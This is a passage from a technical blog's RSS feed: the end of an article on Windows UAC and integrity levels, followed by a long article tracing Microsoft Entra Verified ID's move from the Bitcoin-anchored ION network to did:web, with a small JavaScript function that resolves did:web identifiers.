  { term: &quot;Secure Desktop&quot;, definition: &quot;A separate desktop object (Winlogon) within WinSta0 in the user&apos;s interactive session, on which consent.exe renders the UAC prompt. Not Session 0.&quot; },
  { term: &quot;Application Information service (Appinfo)&quot;, definition: &quot;The SYSTEM-trusted Windows service that mediates the filtered-to-linked token swap at elevation time. Exposes RAiLaunchAdminProcess.&quot; },
  { term: &quot;Auto-elevation allowlist&quot;, definition: &quot;The internal Appinfo allowlist of Microsoft-signed binaries in trusted directories whose manifests assert autoElevate=true. Four gates: manifest, signature, path, allowlist entry.&quot; },
  { term: &quot;COM Elevation Moniker&quot;, definition: &quot;Per-object elevation via Elevation:Administrator!new:{CLSID}. Spins up a single CLSID in an isolated High-IL dllhost.exe while the caller stays Medium.&quot; },
  { term: &quot;System Managed Administrator Account (SMAA)&quot;, definition: &quot;The per-user separate identity Administrator Protection provisions at first elevation. Different SID, profile, HKCU, LUID from the calling user.&quot; },
  { term: &quot;Biba Star Integrity Property&quot;, definition: &quot;No write up: a subject at integrity level Is cannot write an object at integrity level Io &amp;gt; Is. MIC implements this as the default NO_WRITE_UP policy.&quot; }
]} questions={[
  { q: &quot;Why is MIC a separate evaluator rather than another ACE in the DACL?&quot;, a: &quot;Because DACLs are discretionary by definition; an object owner can rewrite the DACL. MIC&apos;s mandatory semantics require an evaluator that runs before the DACL and cannot be overridden by it. The HRU 1976 undecidability of the access-matrix safety question is the formal reason mandatory policy cannot be encoded as discretionary ACEs and remain decidable.&quot; },
  { q: &quot;Why doesn&apos;t the consent prompt elevate?&quot;, a: &quot;Because the elevated token was constructed at logon by LSA, not at consent time by the prompt. The prompt asks the user whether the OS may use the already-existing linked full token to launch a new process. The token swap is performed by Appinfo, not by consent.exe; the prompt is the consent surface on top of a token-swap primitive.&quot; },
  { q: &quot;Why does UIPI block WM_SETTEXT but not WM_PAINT?&quot;, a: &quot;Because WM_SETTEXT mutates the receiving window&apos;s state (the message replaces the window&apos;s text), and an attacker who can mutate a higher-IL window&apos;s state has gained influence over the higher-IL process. WM_PAINT only asks the window to redraw itself; it carries no attacker-controlled mutation, so allowing it from lower-IL senders is safe.&quot; },
  { q: &quot;Which Biba rules does MIC actually implement?&quot;, a: &quot;Just one. MIC implements the Star Integrity Property (NO_WRITE_UP) as the default policy on every object that does not specify otherwise. MIC does not implement Biba&apos;s Simple Integrity Property (no read down) at all -- there is no NO_READ_DOWN policy in winnt.h. The opt-in NO_READ_UP bit MIC exposes is structurally a Bell-LaPadula simple-security analog applied to integrity SIDs, not a Biba rule. MIC does not implement the Invocation Property either; brokered elevation (COM Elevation Moniker, ShellExecuteEx &apos;runas&apos;, Appinfo) is the operationally usable workaround.&quot; },
  { q: &quot;What changed in November 2024 that turned UAC&apos;s elevation transition into a security boundary?&quot;, a: &quot;Administrator Protection replaced the split-token model&apos;s four shared properties (same SID, same %USERPROFILE%, same HKCU, same LUID) with a System Managed Administrator Account that differs on all four dimensions, and required Windows Hello integrated authentication for every elevation. The structural identity separation defeats the entire registry-hijack bypass class. The residual surface is the UI Access carve-out inherited unchanged from Vista 2007.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>windows-security</category><category>uac</category><category>mandatory-integrity-control</category><category>uipi</category><category>integrity-levels</category><category>access-control</category><category>split-token</category><category>administrator-protection</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>From ION to did:web: The Seven-Year Compromise Behind Microsoft Entra Verified ID</title><link>https://paragmali.com/blog/from-ion-to-didweb-the-seven-year-compromise-behind-microsof/</link><guid isPermaLink="true">https://paragmali.com/blog/from-ion-to-didweb-the-seven-year-compromise-behind-microsof/</guid><description>Microsoft built a Bitcoin-anchored decentralized identity network, ran it for three years, then quietly turned it off. This is what actually ships in May 2026 and why.</description><pubDate>Sat, 30 May 2026 00:00:00 GMT</pubDate><content:encoded>
**Microsoft built a Bitcoin-anchored decentralized identity network, ran it for three years, and quietly turned it off.** What ships under the name *Entra Verified ID* in May 2026 is `did:web` plus JWT-VC plus the Microsoft Authenticator wallet -- an enterprise identity product that reuses DNS and the X.509 certificate-authority chain as its trust root. The 2019 promises of permissionless anchoring, JSON-LD elegance, and BBS-style selective disclosure did not survive contact with paying customers. The EU&apos;s EUDI Wallet deadline of 24 December 2026 may force a second pivot. This article walks the seven-year compromise.
&lt;h2&gt;1. One Trust System&lt;/h2&gt;
&lt;p&gt;In May 2019, the Microsoft Identity Division opened a corporate blog post with this sentence:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&quot;We believe every person needs a decentralized, digital identity they own and control, backed by self-owned identifiers that enable secure, privacy preserving interactions.&quot; [@simons-buchner-2019]&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;In December 2023, a one-line entry in the Microsoft Entra Verified ID changelog read:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&quot;The option of selecting did:ion as a trust system is removed. The only trust system available is did:web.&quot; [@ms-learn-whatsnew]&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Both sentences are Microsoft. Both are about identity. Both are about decentralization. Both are official. They are six years apart and they contradict each other.&lt;/p&gt;
&lt;p&gt;This article is the story of what happened in between, and what it tells us about the gap between any decentralized-identity vision and any decentralized-identity product that actually ships. It is not a Microsoft product tour, and it is not a polemic. It is an analysis of &lt;em&gt;which&lt;/em&gt; trade-offs the seven-year journey made and &lt;em&gt;why&lt;/em&gt; each trade-off was reasonable at the time it was made.&lt;/p&gt;
&lt;p&gt;By the end you will know three things: what was promised in 2019, what is actually shipping in May 2026, and what may yet change under the EU&apos;s 24 December 2026 wallet deadline [@eidas-2]. Each of those three answers turns on a single architectural decision that the rest of the story will keep coming back to: where the trust root sits.&lt;/p&gt;
&lt;p&gt;To see how Microsoft got from one sentence to the other, we have to start two decades earlier, before there was a &quot;decentralized identity&quot; movement to join.&lt;/p&gt;
&lt;h2&gt;2. Cameron&apos;s Long Shadow: Microsoft&apos;s 20-Year Identity Detour&lt;/h2&gt;
&lt;p&gt;Microsoft did not arrive at decentralized identity in 2019. It arrived for the second time.&lt;/p&gt;
&lt;p&gt;The first arrival was in May 2005, when Kim Cameron, then identity architect at Microsoft, published &lt;em&gt;The Laws of Identity&lt;/em&gt; on his personal weblog [@cameron-laws-2005]. The seven laws read like an early draft of every self-sovereign identity manifesto that would follow: User Control and Consent; Minimal Disclosure for a Constrained Use; Justifiable Parties; Directed Identity; Pluralism of Operators and Technologies; Human Integration; Consistent Experience Across Contexts.&lt;/p&gt;

A model in which individuals (or organizations) hold their own identifiers and credentials and present them directly to relying parties, without an issuer being online to mediate each transaction. Christopher Allen&apos;s 2016 essay codified ten principles for the model, drawn explicitly from Cameron&apos;s seven Laws [@allen-ssi-2016].

Technical identity systems MUST only reveal information identifying a user with the user&apos;s consent. -- Kim Cameron, *The Laws of Identity*, First Law [@cameron-laws-2005]
&lt;p&gt;Cameron&apos;s first product expression was CardSpace, Microsoft&apos;s user-controlled &quot;information card&quot; selector that shipped with Windows Vista. It died in February 2011 [@cardspace-wiki]. The cause of death was not cryptographic. CardSpace was Windows-only at a moment the web was going mobile. It sat on top of WS-* protocols at a moment the industry was migrating to JSON over HTTP. And it asked relying parties to integrate a new identity layer in the same year Sign-in-with-Facebook and Sign-in-with-Google were eating the relying-party adoption budget.&lt;/p&gt;
&lt;p&gt;Two ideas survived the wreckage: the user as the holder of their own credentials, and Cameron&apos;s seven Laws as a recurring design checklist.&lt;/p&gt;
&lt;p&gt;U-Prove, Microsoft&apos;s research project on &lt;a href=&quot;https://paragmali.com/blog/the-age-gate-that-doesnt-know-your-age-how-anonymous-credent/&quot; rel=&quot;noopener&quot;&gt;unlinkable credentials&lt;/a&gt; acquired from Credentica in March 2008 [@credentica-2008-archive], survived CardSpace&apos;s death as a Microsoft Research project on the U-Prove anonymous-credential technology [@msr-uprove] but never shipped as a product. Its cryptographic ideas reappear, two decades later, in the BBS signature work that EUDI Wallet implementers are now adopting.&lt;/p&gt;
&lt;p&gt;Five years after CardSpace was discontinued, the movement rebooted in public. In April 2016 Christopher Allen, a co-author of the IETF Transport Layer Security (TLS) Security Standard [@allen-about], published &lt;em&gt;The Path to Self-Sovereign Identity&lt;/em&gt; [@allen-ssi-2016]. The essay named the four eras of online identity (centralized, federated, user-centric, self-sovereign), gave the new model the name that stuck, and offered ten SSI principles drawn line by line from Cameron&apos;s Laws.&lt;/p&gt;
&lt;p&gt;The Decentralized Identity Foundation (DIF) was organized in 2017 as a project of the Joint Development Foundation, with Microsoft as a founding member [@dif-org-faq]; the Joint Development Foundation itself joined the Linux Foundation at the end of 2018.&lt;/p&gt;
&lt;p&gt;Microsoft committed in writing on 12 February 2018, in a strategy post by Ankur Patel naming four building blocks the company would invest in: decentralized identifiers, verifiable credentials, identity hubs for off-chain personal data, and a universal resolver for any DID method [@patel-2018]. Fifteen months later, in May 2019, Alex Simons and Daniel Buchner turned that strategy into an architectural commitment: Microsoft would invest in a Bitcoin-anchored Layer-2 network it called ION, built on the DIF Sidetree protocol, and presented as a way to scale decentralized identifier writes to the rate of public adoption [@simons-buchner-2019].&lt;/p&gt;
&lt;p&gt;By 2019 Microsoft had committed to the architecture in writing. It had not yet committed any production code. The next question was what trust root the new system would use, and that answer would change three times in the seven years that followed.&lt;/p&gt;

flowchart LR
    A[&quot;2005 Cameron publishes Laws of Identity&quot;] --&amp;gt; B[&quot;2006 CardSpace ships with Vista&quot;]
    B --&amp;gt; C[&quot;2011 CardSpace discontinued&quot;]
    C --&amp;gt; D[&quot;2016 Allen names SSI&quot;]
    D --&amp;gt; E[&quot;2017 DIF founded&quot;]
    E --&amp;gt; F[&quot;2018 Patel strategy post&quot;]
    F --&amp;gt; G[&quot;2019 Simons and Buchner announce ION&quot;]
    G --&amp;gt; H[&quot;2022 Entra Verified ID GA&quot;]
&lt;h2&gt;3. The Federation Stack and the SSI Premise&lt;/h2&gt;
&lt;p&gt;To understand why anyone thought SSI was a successor architecture, picture the most boring identity flow you have: signing into a third-party app with your work email.&lt;/p&gt;
&lt;p&gt;The OpenID Connect (OIDC) protocol that almost every modern federation flow speaks works by having your employer&apos;s identity provider (the IdP) mint a short-lived signed ID Token, audience-scoped to one specific relying party (RP), the moment you log in [@openid-connect-core]. The RP redirects you to the IdP, the IdP authenticates you, the IdP returns a JWT addressed only to that RP, and the RP verifies the IdP&apos;s signature against a JSON Web Key Set the IdP publishes at a well-known URL. SAML and WS-Federation differ in syntax but not in shape.&lt;/p&gt;
&lt;p&gt;Federation works. It is what every meaningful enterprise login uses today. It is also engineered around three structural choices that the SSI movement called out as compromises:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;The IdP is online at verification time.&lt;/strong&gt; Each RP-IdP pair re-runs the dance. The IdP knows every login: where, when, to whom. That is a powerful surveillance vantage and a single point of compromise.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;The user never holds the credential.&lt;/strong&gt; You cannot take a Microsoft-issued &quot;employed at Microsoft&quot; assertion and show it to a relying party your employer did not pre-integrate. The IdP authorizes each RP, not the user.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;There is no story for selective claim disclosure.&lt;/strong&gt; An OIDC ID Token reveals every claim in the audience-specific payload to that RP. There is no engineering hook for &quot;prove you are over 18 without revealing your birthdate.&quot;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The structural answer the SSI movement proposed is simple to state. If the user could hold a signed assertion that any verifier could check against the issuer&apos;s public key, &lt;em&gt;without the issuer being online during verification&lt;/em&gt;, all three complaints dissolve. The credential becomes a portable object the user carries from verifier to verifier. The issuer&apos;s role collapses to a one-time signing event plus a way to publish a public key and a revocation status. The verifier&apos;s role collapses to fetching that key and checking the signature.&lt;/p&gt;

A tamper-evident, cryptographically signed claim about a subject, issued by an issuer in a format that a verifier can check independently of the issuer at verification time. The W3C Verifiable Credentials Data Model defines the abstract structure; the on-the-wire format can be JSON-LD with a Data Integrity proof, or a JSON Web Token signed under JWS (JWT-VC) [@w3c-vc-1-0].

A URI of the form `did::` that resolves to a DID Document containing the subject&apos;s public keys and service endpoints. The W3C DID Core specification standardizes the abstract data model and lists more than 100 experimental DID methods that each define their own resolution and key-rotation rules [@w3c-did-core].
&lt;p&gt;That observation is the entire intellectual content of the Verifiable Credentials movement, and the W3C Verifiable Credentials Data Model 1.0 (19 November 2019) is its first standardised expression [@w3c-vc-1-0]. The standard explicitly permits two on-the-wire encodings of the same abstract data model: a JSON-LD document with a Data Integrity proof, and a JSON Web Token signed under JWS. Microsoft would later pick the second of those two encodings, and the choice would matter more than the standard&apos;s authors anticipated.&lt;/p&gt;
&lt;p&gt;VCs solve the user-as-holder problem, but only if the verifier has some way to resolve the issuer&apos;s public key when the issuer is not online. That addressing problem is what DIDs are for, and choosing the DID method is where every decentralized-identity vendor&apos;s architecture begins.&lt;/p&gt;

flowchart LR
    subgraph Fed[&quot;Federation (OIDC, SAML)&quot;]
        UF[User] --&amp;gt;|&quot;1. login&quot;| IdP[Identity Provider]
        IdP --&amp;gt;|&quot;2. ID Token, RP-scoped&quot;| RP[Relying Party]
        IdP -.-&amp;gt;|&quot;online during every verification&quot;| RP
    end
    subgraph VC[&quot;VC model&quot;]
        Iss[Issuer] --&amp;gt;|&quot;1. issue VC (once)&quot;| Holder[Holder Wallet]
        Holder --&amp;gt;|&quot;2. present VC&quot;| Ver[Verifier]
        Ver -.-&amp;gt;|&quot;3. resolve issuer public key out-of-band&quot;| DID[DID Resolution]
    end
&lt;h2&gt;4. Five Generations of Verified Identity&lt;/h2&gt;
&lt;p&gt;Five generations of architecture lead to the product Microsoft ships today. Two of them belonged to Microsoft. The middle one was Microsoft&apos;s most ambitious bet, and the one Microsoft retired first.&lt;/p&gt;
&lt;h3&gt;G1: The Whitepaper Era (2018-2019)&lt;/h3&gt;
&lt;p&gt;Patel&apos;s February 2018 strategy post named the four building blocks (DIDs, Verifiable Credentials, Identity Hubs, Universal DID Resolver) but committed to no concrete trust root [@patel-2018]. Fifteen months later the trust root arrived, named, in the Simons and Buchner blog post: a Layer-2 network on Bitcoin called ION, built on the DIF Sidetree protocol [@simons-buchner-2019]. The original 2019 design target was &quot;tens of thousands of operations per second&quot; on the public mainnet. There was no production code yet, only a public-preview wallet (Microsoft Authenticator) and a public commitment to ship.&lt;/p&gt;
&lt;h3&gt;G2: ION Mainnet (2020-2021)&lt;/h3&gt;

A DIF Ratified Specification that batches thousands of DID create, update, recover, and deactivate operations into a single anchor transaction on an underlying ledger. Sidetree itself is ledger-agnostic; ION was the Sidetree-on-Bitcoin instantiation [@dif-sidetree]. Editors of the spec: Daniel Buchner (Microsoft), Orie Steele (Transmute), and Troy Ronda (SecureKey).
&lt;p&gt;The June 2020 ION beta gave way to the v1 mainnet launch on 25 March 2021 [@ion-liftoff-2021]. Buchner&apos;s announcement post on the Microsoft Identity Standards blog framed it as the moment &quot;decentralized identifiers, anchored on Bitcoin via Sidetree&quot; became real infrastructure [@bitcoinmag-ion-v1].&lt;/p&gt;
&lt;p&gt;The DIF ION project page documents the demonstrated capacity as &quot;thousands of DID operations per second across the network&quot; with a strongly eventually consistent model [@ion-dif]. The earlier &quot;tens of thousands&quot; figure had been the 2019 design target, not the demonstrated mainnet capacity, and the public liftoff post itself recorded the &quot;thousands of operations per second&quot; figure once mainnet was live [@ion-liftoff-rss].&lt;/p&gt;
&lt;p&gt;Microsoft Authenticator served as the preview holder wallet; an ION operator ran a public node; Bitcoin transaction fees and IPFS pinning paid the operational cost of the trustless anchoring story. The ION repository on GitHub remains live as a DIF project [@ion-github].&lt;/p&gt;
&lt;h3&gt;G3: Entra Verified ID GA (2022)&lt;/h3&gt;
&lt;p&gt;Fourteen months after launching ION on Bitcoin, Microsoft made two architecturally decisive choices that did not look decisive at the time.&lt;/p&gt;
&lt;p&gt;On 14 June 2022, an entry in the Verified ID whats-new changelog added &lt;code&gt;did:web&lt;/code&gt; as a supported trust system alongside &lt;code&gt;did:ion&lt;/code&gt; [@ms-learn-whatsnew]. On 8 August 2022, the product went generally available under the new Entra brand [@entra-ga-2022].&lt;/p&gt;
&lt;p&gt;The second decisive choice was the credential format. The W3C VC Data Model permits both JSON-LD with Data Integrity Proofs and JSON Web Tokens; Microsoft picked JWT-VC, an artifact signed end-to-end under JWS [@rfc-7515]. Both choices were small in the changelog and load-bearing for the pivot that followed.&lt;/p&gt;

A Verifiable Credential encoded as a JSON Web Token and signed under JSON Web Signature (JWS, RFC 7515 [@rfc-7515]). The encoding rules are specified in section 6.3.1 of the W3C VC Data Model v1.1 [@w3c-vc-1-1]. Because the JWS is computed over the whole payload, a JWT-VC is presented atomically: you reveal every claim, or none. This is the format Microsoft Entra Verified ID issues.
&lt;h3&gt;G4: The Pivot (2023-2024)&lt;/h3&gt;
&lt;p&gt;The product&apos;s first marquee deployment landed on 12 April 2023: LinkedIn&apos;s Workplace Verification feature, built on Entra Verified ID, launched with &quot;more than 70 organizations representing millions of LinkedIn members, including companies like Accenture, Avanade, and Microsoft&quot; [@chik-linkedin-2023].&lt;/p&gt;
&lt;p&gt;Eight months later, in December 2023, the changelog carried the sentence the entire seven-year arc had been building toward: &lt;em&gt;&quot;The option of selecting did:ion as a trust system is removed. The only trust system available is did:web.&quot;&lt;/em&gt; [@ms-learn-whatsnew].&lt;/p&gt;
&lt;p&gt;In early 2024, Microsoft&apos;s public ION node was wound down. No primary Microsoft source pins a specific day, so the conservative wording is &quot;early 2024&quot; with the December 2023 admin-portal removal as the milestone the official record actually attests.&lt;/p&gt;
&lt;p&gt;Specific calendar-day dates for the public ION node retirement circulate widely in the SSI community, but no primary Microsoft source (Microsoft Learn changelog, the Microsoft Identity Standards blog archive, the ION GitHub commit history, DIF announcement archives) confirms a specific day. The December 2023 admin-portal removal is the primary-source-attested milestone; the public-node wind-down is best described as &quot;early 2024.&quot;&lt;/p&gt;
&lt;h3&gt;G5: The Buildout (2024-2026) and the EUDI Forcing Function&lt;/h3&gt;
&lt;p&gt;Quick Setup, which auto-provisions a &lt;code&gt;did:web&lt;/code&gt; DID for a tenant, went GA in April 2024. Face Check, an Azure AI face-matching add-on, went GA on 12 August 2024. &lt;code&gt;did:web:path&lt;/code&gt; (supporting per-tenant DID paths under one host) opened on request in September 2024 [@ms-learn-whatsnew]. On the standards side, OpenID for Verifiable Presentations 1.0 was approved as a Final Specification in July 2025 [@openid4vp-final-announce] [@openid4vp-final-spec], and OpenID for Verifiable Credential Issuance 1.0 followed in September 2025 [@openid4vci-final-announce] [@openid4vci-final-spec]. Account recovery with Verified ID reached GA in May 2026; the legacy secp256k1 signing algorithm is scheduled for retirement on 1 July 2026 [@ms-learn-whatsnew].&lt;/p&gt;
&lt;p&gt;Meanwhile, on 20 May 2024, Regulation (EU) 2024/1183 (eIDAS 2) entered into force, setting a 24-month deadline for every Member State to provision at least one European Digital Identity Wallet, and an 18-month follow-on for mandatory private-sector acceptance [@eidas-2]. The EUDI Architecture and Reference Framework, currently at v2.9 (May 2026), mandates SD-JWT VC and ISO/IEC 18013-5 mdoc as the two baseline credential formats [@eudi-arf] [@eudi-arf-2-9]. Neither is currently issued by Entra Verified ID.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Generation&lt;/th&gt;
&lt;th&gt;Trust root&lt;/th&gt;
&lt;th&gt;Credential format&lt;/th&gt;
&lt;th&gt;Selective disclosure&lt;/th&gt;
&lt;th&gt;Throughput / Cost&lt;/th&gt;
&lt;th&gt;Status (May 2026)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;G0 OIDC federation&lt;/td&gt;
&lt;td&gt;IdP (online)&lt;/td&gt;
&lt;td&gt;OIDC ID Token (JWS)&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Sub-100 ms&lt;/td&gt;
&lt;td&gt;In production at scale&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;G1 Whitepaper era&lt;/td&gt;
&lt;td&gt;Promised: ledger&lt;/td&gt;
&lt;td&gt;Promised: JSON-LD&lt;/td&gt;
&lt;td&gt;Promised: BBS-style&lt;/td&gt;
&lt;td&gt;n/a&lt;/td&gt;
&lt;td&gt;Superseded&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;G2 ION mainnet&lt;/td&gt;
&lt;td&gt;Bitcoin + IPFS + Sidetree&lt;/td&gt;
&lt;td&gt;JSON-LD or JWT-VC&lt;/td&gt;
&lt;td&gt;None at GA&lt;/td&gt;
&lt;td&gt;Thousands of DID ops/sec [@ion-dif]&lt;/td&gt;
&lt;td&gt;Retired Dec 2023&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;G3 Entra GA (Aug 2022)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;did:web&lt;/code&gt; and &lt;code&gt;did:ion&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;JWT-VC&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;did:web one HTTPS GET&lt;/td&gt;
&lt;td&gt;Superseded by G4&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;G4 Entra did:web-only&lt;/td&gt;
&lt;td&gt;&lt;code&gt;did:web&lt;/code&gt; (DNS + CA)&lt;/td&gt;
&lt;td&gt;JWT-VC&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;One HTTPS GET&lt;/td&gt;
&lt;td&gt;Current shipping product&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;G5 EUDI-aligned&lt;/td&gt;
&lt;td&gt;TBD&lt;/td&gt;
&lt;td&gt;SD-JWT VC + mdoc&lt;/td&gt;
&lt;td&gt;Yes (hash-based, mdoc selective)&lt;/td&gt;
&lt;td&gt;TBD&lt;/td&gt;
&lt;td&gt;EU mandate; Microsoft commitment open&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Two generations are in production today. One is the one Microsoft ships. The other is the one the EU is preparing to mandate. They do not yet agree on a credential format. That gap is the central open question of the article&apos;s last third.&lt;/p&gt;

flowchart LR
    G1[&quot;G1 (2018-2019) Whitepaper four blocks: DIDs, VCs, hubs, resolver&quot;] --&amp;gt;|&quot;add Bitcoin anchoring&quot;| G2[&quot;G2 (2020-2021) ION mainnet Sidetree on Bitcoin&quot;]
    G2 --&amp;gt;|&quot;add did:web, JWT-VC; brand as Entra&quot;| G3[&quot;G3 (Aug 2022) Entra Verified ID GA&quot;]
    G3 --&amp;gt;|&quot;remove did:ion (Dec 2023)&quot;| G4[&quot;G4 (2024-2026) did:web-only Entra&quot;]
    G4 --&amp;gt;|&quot;open: add SD-JWT VC + mdoc?&quot;| G5[&quot;G5 EUDI-aligned (TBD by Dec 2026)&quot;]
&lt;h2&gt;5. The Breakthrough: Why did:web Was the Pivot&lt;/h2&gt;
&lt;p&gt;The decisive sentence in the entire Entra Verified ID story is not in a press release. It is in the Introduction of a W3C Community Group draft:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&quot;DIDs that target a distributed ledger face significant practical challenges in bootstrapping enough meaningful trusted data around identities to incentivize mass adoption. We propose a new DID method using a web domain&apos;s existing reputation.&quot; [@did-web-spec]&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;That is the W3C &lt;code&gt;did:web&lt;/code&gt; Method Specification arguing, in its own opening paragraph, that the trust-bootstrapping problem ledger-anchored DIDs were designed to solve is the same problem that prevents ledger-anchored DIDs from being adopted at scale. The proposed alternative reuses something the world already has: DNS plus the X.509 certificate-authority system.&lt;/p&gt;
&lt;h3&gt;What &lt;code&gt;did:web&lt;/code&gt; actually does&lt;/h3&gt;
&lt;p&gt;A &lt;code&gt;did:web:example.com&lt;/code&gt; resolves, by the algorithm in the spec, to &lt;code&gt;https://example.com/.well-known/did.json&lt;/code&gt;. The file is a plain JSON DID Document containing the subject&apos;s public keys and service endpoints. A &lt;code&gt;did:web:example.com:tenants:acme&lt;/code&gt; resolves to &lt;code&gt;https://example.com/tenants/acme/did.json&lt;/code&gt;. That is the whole resolution algorithm. There is no ledger to query, no Sidetree batch to replay, no anchor transaction to wait for, no IPFS pin to refresh.&lt;/p&gt;
&lt;p&gt;{`
// Convert a did:web identifier into the URL where its DID document lives.
function didWebToUrl(did) {
  if (!did.startsWith(&apos;did:web:&apos;)) throw new Error(&apos;not a did:web&apos;);
  const methodSpecific = did.slice(&apos;did:web:&apos;.length);
  // Split on &apos;:&apos; (path separator). Percent-decode each segment.
  const parts = methodSpecific.split(&apos;:&apos;).map(decodeURIComponent);
  const host = parts[0];
  const pathSegments = parts.slice(1);
  if (pathSegments.length === 0) {
    return &apos;https://&apos; + host + &apos;/.well-known/did.json&apos;;
  }
  return &apos;https://&apos; + host + &apos;/&apos; + pathSegments.join(&apos;/&apos;) + &apos;/did.json&apos;;
}&lt;/p&gt;
&lt;p&gt;console.log(didWebToUrl(&apos;did:web:example.com&apos;));
// &lt;a href=&quot;https://example.com/.well-known/did.json&quot; rel=&quot;noopener&quot;&gt;https://example.com/.well-known/did.json&lt;/a&gt;
console.log(didWebToUrl(&apos;did:web:example.com:tenants:acme&apos;));
// &lt;a href=&quot;https://example.com/tenants/acme/did.json&quot; rel=&quot;noopener&quot;&gt;https://example.com/tenants/acme/did.json&lt;/a&gt;
console.log(didWebToUrl(&apos;did:web:port-example.com%3A8443:tenants:acme&apos;));
// &lt;a href=&quot;https://port-example.com:8443/tenants/acme/did.json&quot; rel=&quot;noopener&quot;&gt;https://port-example.com:8443/tenants/acme/did.json&lt;/a&gt;
`}&lt;/p&gt;
&lt;h3&gt;Why this collapsed ION&apos;s complexity&lt;/h3&gt;
&lt;p&gt;Walk through the ION costs that disappear. No Bitcoin full node to run. No IPFS pinning service to maintain. No Sidetree daemon batching CRUD operations. No per-batch on-chain fee. No 60-minute eventual-consistency window before a key rotation propagates. No public-node retirement risk. Key rotation is a JSON file edit; resolution is one HTTPS GET. Microsoft Learn now describes its production identifier system in exactly those terms: &quot;Microsoft currently supports the did:web trust system. The did:web trust system is a permission-based model that allows trust using a web domain&apos;s existing reputation.&quot; [@ms-learn-intro].&lt;/p&gt;
&lt;p&gt;&lt;code&gt;did:web:path&lt;/code&gt; opened on request in September 2024 [@ms-learn-whatsnew]. It allows a tenant to namespace its DID under a path on a shared host (for example, &lt;code&gt;did:web:contoso.com:tenants:acme&lt;/code&gt;), avoiding the need to register a unique subdomain per tenant. The resolution algorithm above handles both shapes.&lt;/p&gt;
&lt;h3&gt;Why every enterprise issuer already had everything did:web requires&lt;/h3&gt;
&lt;p&gt;This is the moment to state the load-bearing argument of the whole article plainly. Enterprise issuers, banks, universities, hospitals, government agencies, and employers already own DNS names. They already pay for X.509 certificates. They already have publicly known organisational identities tied to those names. They have published HR-system endpoints, OAuth issuers, and JWKS URLs on those names for years. The trustless permissionless discovery story that ION solved is a story about &lt;em&gt;new&lt;/em&gt; issuers showing up without prior reputational anchors. The customers who actually wrote cheques for Entra Verified ID are exactly the population whose reputational anchor was already on DNS.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Enterprise issuers never needed permissionless issuer discovery. They already had publicly known organisational identities anchored to DNS and the certificate-authority system. ION solved a problem this population did not have, while imposing operational costs (full-node operation, IPFS pinning, anchoring fees, eventual-consistency latency) that this population did have. &lt;code&gt;did:web&lt;/code&gt; did not lose to ION on cryptography; it won on operational fit.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;The honest concession&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;did:web&lt;/code&gt; is &quot;decentralized&quot; only in the loose sense that there is no central registry of issuers. The trust sits squarely on DNS plus the certificate-authority system. If your registrar suspends your domain, your DID document is unreachable. If a certificate authority mis-issues for your domain, an attacker can stand up a competing DID document at the same identifier.&lt;/p&gt;
&lt;p&gt;The W3C &lt;code&gt;did:web&lt;/code&gt; spec&apos;s Security and Privacy Considerations name this inheritance directly: all DNS security considerations apply, and all TLS security considerations apply [@did-web-spec]. SSI purists consider this a concession that empties the SSI label of meaning. They are not wrong to make that argument; they are choosing a different definition of &quot;decentralized&quot; than the operational one that won.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; There is a sharp definition of &quot;decentralized&quot; (no trusted intermediary, permissionless write, censorship resistance) and there is an operational definition (no single central registry whose failure takes down the whole system, multi-party governance of the standards layer). &lt;code&gt;did:web&lt;/code&gt; is decentralized in the second sense and not in the first. ION attempted the first; it shipped, it ran, and the customers who paid for the product did not value the property highly enough to fund its operational cost.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;Binding the DID back to the domain&lt;/h3&gt;
&lt;p&gt;There is one extra step &lt;code&gt;did:web&lt;/code&gt; needs at the application layer that ION did not. The DID Document at &lt;code&gt;https://example.com/.well-known/did.json&lt;/code&gt; is &lt;em&gt;served&lt;/em&gt; by the domain owner; nothing inside the JSON, by itself, proves that the domain owner is the same entity as the DID subject. The DIF Well-Known DID Configuration document closes that loop with a signed JSON file at &lt;code&gt;https://example.com/.well-known/did-configuration.json&lt;/code&gt; containing one or more domain-linkage credentials issued by the DID and asserting &quot;I, this DID, claim this domain&quot; [@well-known-did-config]. Verifiers fetch both files, check the linkage, and accept the binding.&lt;/p&gt;

